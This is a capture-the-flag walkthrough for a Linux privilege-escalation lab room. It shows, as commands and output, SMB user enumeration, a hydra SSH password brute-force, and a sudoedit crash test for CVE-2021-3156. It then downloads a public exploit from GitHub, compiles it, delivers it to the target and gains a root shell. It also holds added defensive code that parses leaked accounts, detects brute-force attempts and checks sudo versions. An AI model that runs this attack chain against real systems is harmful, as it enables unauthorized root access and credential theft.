Escalate your privileges by exploiting vulnerable binaries.
Enumerate the machine and get an interactive shell. Exploit an SUID bit file, use GNU debugger to take advantage of a buffer overflow and gain root access by PATH manipulation.
There are more points up for grabs in this room.
What are the login credentials for initial access?
The answer format is username:password.
Hint 1: RID range 1000-1003
Hint 2: The longest username has the insecure password.
Step one: enumerate the open ports and the services running on them.
sudo nmap -sS -sV -T4 --open -Pn -p- 10.10.17.162
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 15:15 EST
Nmap scan report for 10.10.17.162
Host is up (0.15s latency).
Not shown: 65505 closed ports, 27 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: THM_EXPLOIT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.73 seconds
NetBIOS/Samba is running on ports 139 and 445. Enumerate the users and shared folders.
enum4linux 10.10.17.162
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 13 15:10:40 2021
[...]
 =======================================================================
|    Users on 10.10.17.162 via RID cycling (RIDS: 500-550,1000-1050)    |
 =======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2007993849-1719925537-2372789573
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kel (Local User)
S-1-22-1-1001 Unix User\des (Local User)
S-1-22-1-1002 Unix User\tryhackme (Local User)
S-1-22-1-1003 Unix User\noentry (Local User)
[+] Enumerating users using SID S-1-5-21-2007993849-1719925537-2372789573 and logon username '', password ''
S-1-5-21-2007993849-1719925537-2372789573-500 *unknown*\*unknown* (8)
S-1-5-21-2007993849-1719925537-2372789573-501 THM_EXPLOIT\nobody (Local User)
[...]
S-1-5-21-2007993849-1719925537-2372789573-513 THM_EXPLOIT\None (Domain Group)
[...]
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[...]
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[...]
 =============================================
|    Getting printer info for 10.10.17.162    |
 =============================================
No printers returned.
enum4linux complete on Sat Mar 13 15:20:47 2021
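Added example (not from the original post): a small parser for the RID-cycling section above that shows which local Unix accounts the Samba service hands to an anonymous session, and applies the room's two hints (RID range 1000-1003, longest username) to the parsed list. The "S-1-22-1 ... Unix User\name (Local User)" line format is taken from the output; the sample input is a retyped excerpt.

```python
import re

# Constructed test input (not the original post): the RID-cycling lines from
# the enum4linux output above, retyped so the parser can run offline.
ENUM4LINUX_OUTPUT = """\
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\\kel (Local User)
S-1-22-1-1001 Unix User\\des (Local User)
S-1-22-1-1002 Unix User\\tryhackme (Local User)
S-1-22-1-1003 Unix User\\noentry (Local User)
[+] Enumerating users using SID S-1-5-21-2007993849-1719925537-2372789573 and logon username '', password ''
S-1-5-21-2007993849-1719925537-2372789573-501 THM_EXPLOIT\\nobody (Local User)
S-1-5-32-544 BUILTIN\\Administrators (Local Group)
"""

# S-1-22-1 is Samba's "Unix Users" authority: the trailing RID is the account's Unix UID,
# so an anonymous session that can cycle RIDs learns real login names and their UIDs.
UNIX_USER_RE = re.compile(r"^S-1-22-1-(\d+)\s+Unix User\\(\S+)\s+\(Local User\)")

def parse_unix_users(output):
    """Return {uid: username} for every Unix user the RID cycling revealed."""
    users = {}
    for line in output.splitlines():
        m = UNIX_USER_RE.match(line.strip())
        if m:
            users[int(m.group(1))] = m.group(2)
    return users

def users_in_rid_range(output, low, high):
    """Usernames whose UID falls inside [low, high], ordered by UID (hint 1 gives 1000-1003)."""
    return [name for uid, name in sorted(parse_unix_users(output).items()) if low <= uid <= high]

def longest_username(names):
    """Hint 2: the longest username is the account with the weak password."""
    return max(names, key=len) if names else None
```

A host that answers like this is leaking its local account list to unauthenticated SMB clients; restricting anonymous (null session) access in smb.conf closes that gap.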
Use hydra to brute-force the SSH service and recover the tryhackme password.
hydra -l tryhackme -P /usr/share/wordlists/rockyou.txt 10.10.17.162 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-13 15:38:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.17.162:22/
[STATUS] 179.00 tries/min, 179 tries in 00:01h, 14344223 to do in 1335:36h, 16 active
[STATUS] 113.00 tries/min, 339 tries in 00:03h, 14344063 to do in 2115:39h, 16 active
[STATUS] 117.00 tries/min, 819 tries in 00:07h, 14343583 to do in 2043:15h, 16 active
[ssh] host: 10.10.17.162   login: tryhackme   password: PASSWORD_TEXT
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-13 15:46:03
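For the defender's side of the run above, an added example (not part of the original post): it scans sshd auth.log lines for the burst of "Failed password" events that a hydra run with 16 parallel tasks produces, and flags a source that later gets an "Accepted password" from the same address. The log lines, host name and IP addresses are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log lines (not from the original post): a hydra run like the one above
# lands on the target as a burst of "Failed password" events from a single source IP.
SAMPLE_AUTH_LOG = """\
Mar 13 15:38:31 thm_exploit sshd[1201]: Failed password for tryhackme from 10.10.14.5 port 40210 ssh2
Mar 13 15:38:31 thm_exploit sshd[1202]: Failed password for tryhackme from 10.10.14.5 port 40211 ssh2
Mar 13 15:38:32 thm_exploit sshd[1203]: Failed password for invalid user admin from 10.10.14.5 port 40212 ssh2
Mar 13 15:38:32 thm_exploit sshd[1204]: Failed password for tryhackme from 10.10.14.5 port 40213 ssh2
Mar 13 15:38:33 thm_exploit sshd[1205]: Failed password for tryhackme from 10.10.14.5 port 40214 ssh2
Mar 13 15:40:10 thm_exploit sshd[1250]: Failed password for kel from 192.168.1.20 port 50001 ssh2
Mar 13 15:46:02 thm_exploit sshd[1399]: Accepted password for tryhackme from 10.10.14.5 port 40900 ssh2
"""
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

def parse_events(log, year=2021):
    """Yield (timestamp, result, user, ip) per sshd password event; syslog omits the year, so one is assumed."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(log, threshold=5, window=timedelta(minutes=10)):
    """Return {ip: {...}} for sources with >= threshold failures inside window; a later
    'Accepted' from the same source means the guessing most likely succeeded."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, result, user, ip in parse_events(log):
        (failures if result == "Failed" else successes)[ip].append((ts, user))
    alerts = {}
    for ip, events in failures.items():
        events.sort()
        for i in range(len(events) - threshold + 1):
            j = i + threshold - 1  # the burst spans events i..j
            if events[j][0] - events[i][0] <= window:
                alerts[ip] = {
                    "failures": len(events),
                    "users": sorted({u for _, u in events}),
                    "success_after_burst": any(t >= events[j][0] for t, _ in successes[ip]),
                }
                break
    return alerts
```

The same logic is what fail2ban's sshd jail applies; a source that trips the threshold and then authenticates is the case worth paging on.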
The easy way
Last January, the Qualys research team discovered a heap overflow vulnerability, CVE-2021-3156, in sudo that allows any unprivileged user to gain root privileges on Linux without a password. The vulnerability, introduced in 2011, was fixed in the latest version, sudo 9.5p2, released on January 26, 2021.
If you are playing an old CTF room, it is very likely that the machine is vulnerable to CVE-2021-3156.
This is not a new room, so let's test for Baron Samedit. The test is simple and tells us whether the machine is vulnerable.
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): memory corruption
Aborted (core dumped)
It is vulnerable.
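As an added check (not from the original post), the following Python compares a sudo version string against the ranges Qualys listed as affected by CVE-2021-3156 and wraps the sudoedit crash test shown above. The version check alone over-reports on distributions that backport the fix without changing the upstream version string (Ubuntu's patched 1.8.21p2 still reports 1.8.21p2), so the probe is the decisive test.

```python
import re
import subprocess

# Affected ranges from the Qualys advisory for CVE-2021-3156 (Baron Samedit):
# legacy 1.8.2 .. 1.8.31p2 and stable 1.9.0 .. 1.9.5p1; 1.9.5p2 carries the fix.
AFFECTED_RANGES = [((1, 8, 2, 0), (1, 8, 31, 2)), ((1, 9, 0, 0), (1, 9, 5, 1))]

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

def parse_sudo_version(text):
    """Turn 'Sudo version 1.8.21p2' (or a bare '1.9.5p2') into a comparable tuple."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no sudo version found in: {text!r}")
    major, minor, patch, p = m.groups()
    return int(major), int(minor), int(patch), int(p or 0)

def is_vulnerable_version(version):
    """True when the version tuple falls inside one of the affected ranges."""
    return any(low <= version <= high for low, high in AFFECTED_RANGES)

def installed_sudo_vulnerable():
    """Version-string check of the local sudo (None if sudo is missing). Distros such as
    Ubuntu backport the fix without bumping the upstream version, so this can over-report."""
    try:
        out = subprocess.run(["sudo", "--version"], capture_output=True, text=True, timeout=5).stdout
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return is_vulnerable_version(parse_sudo_version(out))

def sudoedit_probe():
    """The crash test from the post: a vulnerable build aborts in malloc() (killed by SIGABRT,
    so the return code is negative), a patched build just prints its usage message."""
    try:
        res = subprocess.run(["sudoedit", "-s", "\\", "A" * 1000], capture_output=True,
                             text=True, stdin=subprocess.DEVNULL, timeout=10)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return res.returncode < 0 or "memory corruption" in res.stderr
```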
There is an exploit available on GitHub, and all we have to do is download and use it.
From your local machine, download the exploit code and compile it with make.
wget https://github.com/blasty/CVE-2021-3156/archive/main.zip
--2021-03-13 15:57:52--  https://github.com/blasty/CVE-2021-3156/archive/main.zip
Resolving github.com (github.com)... 22.214.171.124
Connecting to github.com (github.com)|126.96.36.199|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/blasty/CVE-2021-3156/zip/main [following]
--2021-03-13 15:57:52--  https://codeload.github.com/blasty/CVE-2021-3156/zip/main
Resolving codeload.github.com (codeload.github.com)... 188.8.131.52
Connecting to codeload.github.com (codeload.github.com)|184.108.40.206|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: ‘main.zip’

main.zip                [ <=>                ]   4.22K  --.-KB/s    in 0s

2021-03-13 15:57:52 (8.88 MB/s) - ‘main.zip’ saved

unzip main.zip
Archive:  main.zip
da68f7c1a2961595a3226b903f1fc180b8824255
   creating: CVE-2021-3156-main/
  inflating: CVE-2021-3156-main/Makefile
  inflating: CVE-2021-3156-main/README.md
  inflating: CVE-2021-3156-main/brute.sh
  inflating: CVE-2021-3156-main/hax.c
  inflating: CVE-2021-3156-main/lib.c

cd CVE-2021-3156-main/
make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
Start a local web server with python3:
python3 -m http.server
From the room machine, download the binaries, set the executable flag and run the exploit.
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS"
NAME="Ubuntu"
VERSION="18.04.3 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.3 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

chmod +x -R *
./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty <[email protected]>

usage: ./sudo-hax-me-a-sandwich <target>

available targets:
------------------------------------------------------------
0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
------------------------------------------------------------

manual mode:
./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>

./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty <[email protected]>

using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# id
uid=0(root) gid=0(root) groups=0(root),1002(tryhackme)
Done, you are root. Now just collect the flags and finish the room.
/bin/bash
# ls /root
root.txt
# cat /root/root.txt
The flag: ROOT_FLAG. Also, thank you for your participation. The room is built with love. DesKel out.
# ls /home/des/
bof  bof64.c  flag.txt
# cat /home/des/flag.txt
Good job on exploiting the SUID file.
Never assign +s to any system executable files. Remember, Check gtfobins.
You flag is DES_FLAG
login crdential (In case you need it)
username: des
password: DES_PASSWORD
# ls /home/kel/
exe  exe.c  flag.txt
root@thm_exploit:/tmp/10.6.60.115:8000# cat /home/kel/flag.txt
You flag is KEL_FLAG
The user credential
username: kel
password: KEL_PASSWORD
So guys and girls, this is done. It was fast, but not beautiful; later I will try to finish this room in the right manner.
It is also important to realise that any host that has not been updated can be vulnerable to this exploit, and a simple test followed by an update can prevent further damage.